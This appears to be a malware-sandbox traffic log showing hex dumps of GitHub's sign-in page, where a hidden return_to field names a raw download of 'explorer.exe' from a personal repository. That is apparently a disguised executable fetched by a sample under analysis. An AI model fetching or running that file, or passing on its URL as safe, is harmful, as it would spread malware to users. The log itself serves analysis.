69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 4c 43 75 6a 49 78
                                                                                                                Data Ascii: -controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" value="LCujIx
                                                                                                                2022-10-13 11:08:11 UTC3928INData Raw: 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70
                                                                                                                Data Ascii: -to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump
                                                                                                                2022-10-13 11:08:11 UTC3929INData Raw: 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20
                                                                                                                Data Ascii: 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path
                                                                                                                2022-10-13 11:08:11 UTC3930INData Raw: 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6e 6f 2d 72 65 73 75 6c 74 73 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 66 35 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 20 70 2d 32
                                                                                                                Data Ascii: to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li></ul><ul class="d-none js-jump-to-no-results-template-container"> <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2
                                                                                                                2022-10-13 11:08:11 UTC3932INData Raw: 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2d 2e 32 76 2d 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68
                                                                                                                Data Ascii: -8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" h
                                                                                                                2022-10-13 11:08:11 UTC3933INData Raw: 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 66 6c 65 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 74 65 78 74 2d 6c 65 66 74 20 6e 6f 2d 77 72 61 70 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c
                                                                                                                Data Ascii: one" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 fl
                                                                                                                2022-10-13 11:08:11 UTC3934INData Raw: 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20
                                                                                                                Data Ascii: mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
                                                                                                                2022-10-13 11:08:11 UTC3936INData Raw: 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30
                                                                                                                Data Ascii: earch" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0
                                                                                                                2022-10-13 11:08:11 UTC3937INData Raw: 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 67 6c 6f 62 61 6c 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c
                                                                                                                Data Ascii: ign-middle"></span> </div> </a></li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto fl
                                                                                                                2022-10-13 11:08:11 UTC3938INData Raw: 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e
                                                                                                                Data Ascii: .75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.
                                                                                                                2022-10-13 11:08:11 UTC3940INData Raw: 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68
                                                                                                                Data Ascii: r </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle"></span> </div> <div aria-h
                                                                                                                2022-10-13 11:08:11 UTC3941INData Raw: 61 31 30 65 64 38 38 34 38 64 64 30 66 38 33 30 37 33 32 61 66 65 64 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 67 61 2d 63 6c 69 63 6b 3d 22 28 4c 6f 67 67 65 64 20 6f 75 74 29 20 48 65 61 64 65 72 2c 20 63 6c 69 63 6b 65 64 20 53 69 67 6e 20 69 6e 2c 20 74 65 78 74 3a 73 69 67 6e 2d 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 69 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 72 69 67 68 74 3a 20 2d 33 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72
                                                                                                                Data Ascii: a10ed8848dd0f830732afed17" data-ga-click="(Logged out) Header, clicked Sign in, text:sign-in"> Sign in </a> <div style="right: -30%; background-color: transparent; border: none" data-view-component="tr
                                                                                                                2022-10-13 11:08:11 UTC3942INData Raw: 62 6c 6f 63 6b 20 6a 73 2d 70 61 73 73 77 6f 72 64 2d 66 69 65 6c 64 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 63 75 72 72 65 6e 74 2d 70 61 73 73 77 6f 72 64 22 20 2f 3e 0a 20 20 20 20 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 77 65 62 61 75 74 68 6e 2d 73 75 70 70 6f 72 74 22 20 6e 61 6d 65 3d 22 77 65 62 61 75 74 68 6e 2d 73 75 70 70 6f 72 74 22 20 76 61 6c 75 65 3d 22 75 6e 6b 6e 6f 77 6e 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 77 65 62 61 75 74 68 6e 2d 69 75 76 70 61 61 2d 73 75 70 70 6f 72 74 22 20 6e 61 6d 65 3d 22 77 65 62 61 75 74 68 6e 2d 69 75 76 70 61 61 2d 73 75 70 70 6f 72 74 22 20 76 61 6c 75 65 3d 22 75 6e 6b 6e 6f 77
                                                                                                                Data Ascii: block js-password-field" autocomplete="current-password" /> <input type="hidden" class="js-webauthn-support" name="webauthn-support" value="unknown"><input type="hidden" class="js-webauthn-iuvpaa-support" name="webauthn-iuvpaa-support" value="unknow
                                                                                                                2022-10-13 11:08:11 UTC3943INData Raw: 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 6c 6c 6f 77 5f 73 69 67 6e 75 70 22 20 69 64 3d 22 61 6c 6c 6f 77 5f 73 69 67 6e 75 70 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20
                                                                                                                Data Ascii: e="hidden" name="return_to" id="return_to" value="https://github.com/testermanmag/myownre/raw/main/explorer.exe" autocomplete="off" class="form-control" /><input type="hidden" name="allow_signup" id="allow_signup" autocomplete="off" class="form-control"
                                                                                                                2022-10-13 11:08:11 UTC3944INData Raw: 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 2d 2d 73 69 67 6e 2d 75 70 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 64 2d 6e 6f 6e 65 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 62 6f 72 64 65 72 20 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 65 66 61 75 6c 74 20 72 6f 75 6e 64 65 64 20 70 78 2d 32 20 70 79 2d 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f 74 3b 2c 26 71
                                                                                                                Data Ascii: r" class="HeaderMenu-link HeaderMenu-link--sign-up flex-shrink-0 d-none d-lg-inline-block no-underline border color-border-default rounded px-2 py-1" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&q
                                                                                                                2022-10-13 11:08:11 UTC3945INData Raw: 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 78 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 2e 37 32 20 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 4c 38 20 36 2e 39 34 6c 33 2e 32 32 2d 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 36 20 31 2e 30 36 4c 39 2e 30 36 20 38 6c 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36
                                                                                                                Data Ascii: true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06
                                                                                                                2022-10-13 11:08:11 UTC3947INData Raw: 48 42 67 6b 4a 43 67 6f 4a 43 51 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 45 44 41 77 4d 46 42 41 55 4a 42 67 59 4a 44 51 73 4a 43 77 30 50 44 67 34 4f 44 67 38 50 44 41 77 4d 44 41 77 50 44 77 77 4d 44 41 77 4d 44 41 38 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 2f 38 41 41 45 51 67 42 6e 77 4f 73 41 77 45 52 41 41 49 52 41 51 4d 52 41 66 2f 45 41 4c 59 41 41 41 4d 42 41 51 45 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 45 43 41 77 41 45 42 51 59 49 41 51 45 42 41 51 45 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 49 44 42 41 63 51 41 41 45 44 41 77 4d 43 41 77 55 47 42 41 45 47 43 77 67 43 41 77 45 41 45 53 45 78 41 68 4a 42 55 57 46 78 67 5a 47 68 41 2f
                                                                                                                Data Ascii: HBgkJCgoJCQwMDAwMDAwMDAwMDAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgBnwOsAwERAAIRAQMRAf/EALYAAAMBAQEBAQAAAAAAAAAAAAECAwAEBQYIAQEBAQEBAQAAAAAAAAAAAAAAAQIDBAcQAAEDAwMCAwUGBAEGCwgCAwEAESExAhJBUWFxgZGhA/
                                                                                                                2022-10-13 11:08:11 UTC3948INData Raw: 51 4c 39 4d 62 4b 4b 47 48 43 42 63 4f 47 36 4b 52 51 4e 71 51 35 69 47 78 46 4c 67 6d 54 42 54 61 70 46 49 62 55 55 70 73 34 51 4c 68 77 6d 63 4c 6a 4a 44 61 52 6f 70 41 70 73 65 61 49 74 4c 39 4e 51 49 62 44 71 6f 70 44 59 4f 36 42 66 70 68 54 4b 34 49 62 4f 50 42 52 55 38 57 68 75 36 42 63 5a 68 52 53 34 74 32 55 55 70 74 65 45 71 78 4d 32 6d 72 39 30 43 47 32 43 69 6b 4e 70 32 64 31 43 46 4e 71 67 58 45 37 49 4f 45 43 42 48 52 64 48 4f 6d 41 62 70 6f 71 68 67 50 46 55 55 41 34 36 49 68 32 6c 58 41 63 57 37 55 33 52 44 67 61 30 34 56 51 34 47 79 42 78 61 2f 78 52 4f 63 34 44 4b 6f 66 47 56 51 34 74 6e 37 45 52 51 57 6a 5a 57 49 63 57 2f 65 69 6e 46 70 31 56 53 6d 46 74 46 55 55 46 70 53 4c 54 43 7a 38 56 57 54 69 31 51 4f 4c 55 44 43 78 31 55 4d 4c 51
                                                                                                                Data Ascii: QL9MbKKGHCBcOG6KRQNqQ5iGxFLgmTBTapFIbUUps4QLhwmcLjJDaRopApseaItL9NQIbDqopDYO6BfphTK4IbOPBRU8Whu6BcZhRS4t2UUpteEqxM2mr90CG2CikNp2d1CFNqgXE7IOECBHRdHOmAbpoqhgPFUUA46Ih2lXAcW7U3RDga04VQ4GyBxa/xROc4DKofGVQ4tn7ERQWjZWIcW/einFp1VSmFtFUUFpSLTCz8VWTi1QOLUDCx1UMLQ
                                                                                                                2022-10-13 11:08:11 UTC3949INData Raw: 51 34 74 4f 79 71 47 46 69 42 38 65 46 59 48 46 68 56 51 77 39 4e 45 4f 4c 41 67 59 57 38 4b 77 50 67 67 62 41 49 6d 54 43 31 41 32 50 44 49 6f 34 4b 6f 63 57 64 30 4b 59 57 49 68 73 41 67 49 73 47 79 71 47 46 76 43 4c 79 47 77 4b 49 49 39 4d 6f 55 33 30 39 30 6f 50 30 77 6c 44 43 77 62 49 44 69 4e 6c 63 4a 6b 63 65 79 41 34 6f 44 69 6e 4d 66 45 52 59 67 4f 43 41 34 42 41 63 41 68 57 77 53 67 34 63 49 67 34 63 49 44 69 71 4e 68 77 6f 6f 34 6c 42 73 55 51 63 45 47 77 52 52 77 53 70 6c 73 46 46 62 46 57 46 6f 34 6c 41 4d 53 6f 44 69 71 59 62 46 42 73 56 49 56 73 65 46 52 73 54 73 6f 6f 34 6e 5a 42 73 4f 45 41 78 56 47 77 43 6c 47 77 43 55 62 41 4a 53 4e 39 4d 49 4e 39 4d 49 4e 39 50 5a 53 72 41 77 34 52 65 55 4d 45 51 75 43 44 59 4b 4e 53 68 67 71 67 47 30
                                                                                                                Data Ascii: Q4tOyqGFiB8eFYHFhVQw9NEOLAgYW8KwPggbAImTC1A2PDIo4KocWd0KYWIhsAgIsGyqGFvCLyGwKII9MoU3090oP0wlDCwbIDiNlcJkceyA4oDinMfERYgOCA4BAcAhWwSg4cIg4cIDiqNhwoo4lBsUQcEGwRRwSplsFFbFWFo4lAMSoDiqYbFBsVIVseFRsTsoo4nZBsOEAxVGwClGwCUbAJSN9MIN9MIN9PZSrAw4ReUMEQuCDYKNShgqgG0
                                                                                                                2022-10-13 11:08:11 UTC3951INData Raw: 44 61 68 43 34 42 41 44 59 69 77 75 48 43 6d 63 6d 4d 42 67 64 6b 61 44 41 37 49 6d 41 77 34 55 69 6c 50 70 70 43 6c 77 53 4c 53 2f 54 51 4b 66 54 55 43 2f 54 47 79 51 44 36 59 32 55 79 75 43 48 30 78 73 69 6b 4e 68 43 68 67 70 74 55 55 68 73 34 52 53 47 31 41 68 74 52 53 47 7a 68 51 49 66 54 4b 4b 51 32 48 62 75 6f 71 64 31 69 69 70 6d 77 71 5a 79 45 4e 69 4c 6a 4b 5a 39 4d 4b 4b 6d 62 4e 6c 46 54 4e 76 43 4b 6d 62 4f 46 41 68 43 6d 63 4b 6e 64 61 66 77 55 56 49 32 6f 53 6c 62 33 55 30 55 69 76 47 46 71 37 31 77 71 67 74 56 52 59 57 38 4a 67 79 63 57 75 7a 61 71 6f 74 62 61 50 76 56 52 51 57 70 67 79 6f 4c 56 57 63 72 43 31 6b 44 69 33 75 69 4b 43 31 57 49 6f 4c 56 59 5a 79 70 62 62 52 45 71 6f 74 4e 4b 71 38 68 79 6e 46 70 56 51 34 73 4b 71 48 46 68 4b
                                                                                                                Data Ascii: DahC4BADYiwuHCmcmMBgdkaDA7ImAw4UilPppClwSLS/TQKfTUC/TGyQD6Y2UyuCH0xsikNhChgptUUhs4RSG1AhtRSGzhQIfTKKQ2Hbuoqd1iipmwqZyENiLjKZ9MKKmbNlFTNvCKmbOFAhCmcKndafwUVI2oSlb3U0UivGFq71wqgtVRYW8JgycWuzaqotbaPvVRQWpgyoLVWcrC1kDi3uiKC1WIoLVYZypbbREqotNKq8hynFpVQ4sKqHFhK
